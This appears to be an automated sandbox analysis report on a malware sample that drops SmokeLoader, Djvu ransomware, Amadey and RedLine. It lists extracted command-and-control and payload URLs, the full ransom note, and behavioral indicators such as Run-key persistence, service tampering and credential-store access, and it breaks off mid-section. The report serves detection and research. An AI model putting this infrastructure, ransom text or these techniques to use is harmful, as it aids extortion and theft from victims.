Resubmissions
27-03-2023 07:51
230327-jp31kscd46 1027-03-2023 07:48
230327-jm8s2sed6s 127-03-2023 07:35
230327-jeqmhacc77 10Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
27-03-2023 07:35
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
269KB
-
MD5
26d85c2bdc983c43452401545f3c6007
-
SHA1
e18a2a223b91f426b5dab23b13970264d1da6ebc
-
SHA256
c8313943995590c444dac429919bc562c8f81c7d81c898fbb9bd7822dce889f4
-
SHA512
d652d2c4ab97507e0b61b37dc069b024a531b56e80f95a449d201ba6b0a1b6baecc33162be4f4a4571054295154c2c4c0a27f6831ac5dd37f0d27e3795fde3e5
-
SSDEEP
3072:Fm6fmyQA+BF8tlkC42EVOkAz+t/lB2SpYeEvyqbxDFoio56WmxeQZn78F:zQLK42EskAhS+7fyZmB
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://aapu.at/tmp/
http://poudineh.com/tmp/
http://firsttrusteedrx.ru/tmp/
http://kingpirate.ru/tmp/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.typo
-
offline_id
Yao2o6f5vNghOpgVBhEIA8O96SC5vLcgITgaRMt1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-f8UEvx4T0A Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0672IsjO
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
redline
koreamon
koreamonitoring.com:80
-
auth_value
1a0e1a9f491ef3df873a03577dfa10aa
Signatures
-
DcRat 5 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
file.exeD97C.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\2f93599c-985f-4394-9efd-355ec48635b4\\D97C.exe\" --AutoStart" D97C.exe 384 schtasks.exe 3328 schtasks.exe 5072 schtasks.exe -
Detected Djvu ransomware 16 IoCs
Processes:
resource yara_rule behavioral2/memory/4232-149-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4232-154-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2136-155-0x0000000004A10000-0x0000000004B2B000-memory.dmp family_djvu behavioral2/memory/4232-156-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4232-162-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4232-173-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-179-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-180-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-185-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-186-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-187-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-200-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-202-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-203-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-217-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3748-295-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/3860-327-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-328-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-330-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-332-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-334-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-339-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-341-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-343-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline behavioral2/memory/3860-345-0x0000000004D00000-0x0000000004D52000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
XandETC.exeupdater.execonhost.exedescription pid process target process PID 4008 created 2172 4008 XandETC.exe Explorer.EXE PID 4008 created 2172 4008 XandETC.exe Explorer.EXE PID 4008 created 2172 4008 XandETC.exe Explorer.EXE PID 4008 created 2172 4008 XandETC.exe Explorer.EXE PID 4008 created 2172 4008 XandETC.exe Explorer.EXE PID 3300 created 2172 3300 updater.exe Explorer.EXE PID 3300 created 2172 3300 updater.exe Explorer.EXE PID 3300 created 2172 3300 updater.exe Explorer.EXE PID 3300 created 2172 3300 updater.exe Explorer.EXE PID 4900 created 2172 4900 conhost.exe Explorer.EXE PID 3300 created 2172 3300 updater.exe Explorer.EXE PID 3300 created 2172 3300 updater.exe Explorer.EXE -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
JGAbA.bat.exeD97C.exePlayer3.exenbveek.exe1737.exe7FD7.bat.exeWScript.exeD97C.exeD05.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation JGAbA.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation D97C.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation Player3.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 1737.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 7FD7.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation D97C.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation D05.exe -
Executes dropped EXE 25 IoCs
Processes:
D97C.exeDDD3.exeD97C.exeDF6A.exeD97C.exeD97C.exeF67D.exeF863.exebuild3.exeD05.exePlayer3.exess31.exenbveek.exeXandETC.exe1737.exePlayer3.exe57EB.exenbveek.exemstsca.exe7FD7.bat.exeBC83.exeupdater.exeJGAbA.bat.exe638196.exenbveek.exepid process 2136 D97C.exe 2348 DDD3.exe 4232 D97C.exe 832 DF6A.exe 5088 D97C.exe 3748 D97C.exe 3136 F67D.exe 3572 F863.exe 2796 build3.exe 100 D05.exe 396 Player3.exe 3872 ss31.exe 4936 nbveek.exe 4008 XandETC.exe 1412 1737.exe 2112 Player3.exe 3860 57EB.exe 2856 nbveek.exe 5088 mstsca.exe 4876 7FD7.bat.exe 3952 BC83.exe 3300 updater.exe 4184 JGAbA.bat.exe 1800 638196.exe 1932 nbveek.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exerundll32.exerundll32.exepid process 4728 rundll32.exe 4160 rundll32.exe 4948 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
D97C.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\2f93599c-985f-4394-9efd-355ec48635b4\\D97C.exe\" --AutoStart" D97C.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 34 api.2ip.ua 35 api.2ip.ua 43 api.2ip.ua -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
BC83.exepid process 3952 BC83.exe 3952 BC83.exe 3952 BC83.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
D97C.exeD97C.exeupdater.exedescription pid process target process PID 2136 set thread context of 4232 2136 D97C.exe D97C.exe PID 5088 set thread context of 3748 5088 D97C.exe D97C.exe PID 3300 set thread context of 4900 3300 updater.exe conhost.exe PID 3300 set thread context of 3860 3300 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
XandETC.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4944 sc.exe 4964 sc.exe 4680 sc.exe 3904 sc.exe 4800 sc.exe 1120 sc.exe 452 sc.exe 1212 sc.exe 1444 sc.exe 2268 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3368 832 WerFault.exe DF6A.exe 5048 3572 WerFault.exe F863.exe 1928 1412 WerFault.exe 1737.exe 5080 4160 WerFault.exe rundll32.exe 1204 3952 WerFault.exe BC83.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
F67D.exefile.exeDDD3.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F67D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F67D.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DDD3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DDD3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F67D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DDD3.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dllhost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 384 schtasks.exe 3328 schtasks.exe 5072 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 1 IoCs
Processes:
7FD7.bat.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings 7FD7.bat.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
file.exeExplorer.EXEpid process 1916 file.exe 1916 file.exe 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2172 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious behavior: MapViewOfSection 21 IoCs
Processes:
file.exeDDD3.exeF67D.exeExplorer.EXEpid process 1916 file.exe 2348 DDD3.exe 3136 F67D.exe 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE 2172 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXE57EB.exepowershell.exe7FD7.bat.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeDebugPrivilege 3860 57EB.exe Token: SeDebugPrivilege 3620 powershell.exe Token: SeDebugPrivilege 4876 7FD7.bat.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeShutdownPrivilege 2172 Explorer.EXE Token: SeCreatePagefilePrivilege 2172 Explorer.EXE Token: SeDebugPrivilege 4856 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeShutdownPrivilege 4420 powercfg.exe Token: SeCreatePagefilePrivilege 4420 powercfg.exe Token: SeDebugPrivilege 692 powershell.exe Token: SeIncreaseQuotaPrivilege 4856 powershell.exe Token: SeSecurityPrivilege 4856 powershell.exe Token: SeTakeOwnershipPrivilege 4856 powershell.exe Token: SeLoadDriverPrivilege 4856 powershell.exe Token: SeSystemProfilePrivilege 4856 powershell.exe Token: SeSystemtimePrivilege 4856 powershell.exe Token: SeProfSingleProcessPrivilege 4856 powershell.exe Token: SeIncBasePriorityPrivilege 4856 powershell.exe Token: SeCreatePagefilePrivilege 4856 powershell.exe Token: SeBackupPrivilege 4856 powershell.exe Token: SeRestorePrivilege 4856 powershell.exe Token: SeShutdownPrivilege 4856 powershell.exe Token: SeDebugPrivilege 4856 powershell.exe Token: SeSystemEnvironmentPrivilege 4856 powershell.exe Token: SeRemoteShutdownPrivilege 4856 powershell.exe Token: SeUndockPrivilege 4856 powershell.exe Token: SeManageVolumePrivilege 4856 powershell.exe Token: 33 4856 powershell.exe Token: 34 4856 powershell.exe Token: 35 4856 powershell.exe Token: 36 4856 powershell.exe Token: SeShutdownPrivilege 1200 powercfg.exe Token: SeCreatePagefilePrivilege 1200 powercfg.exe Token: SeShutdownPrivilege 2128 powercfg.exe Token: SeCreatePagefilePrivilege 2128 powercfg.exe Token: SeShutdownPrivilege 1536 powercfg.exe Token: SeCreatePagefilePrivilege 1536 powercfg.exe Token: SeIncreaseQuotaPrivilege 692 powershell.exe Token: SeSecurityPrivilege 692 powershell.exe Token: SeTakeOwnershipPrivilege 692 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
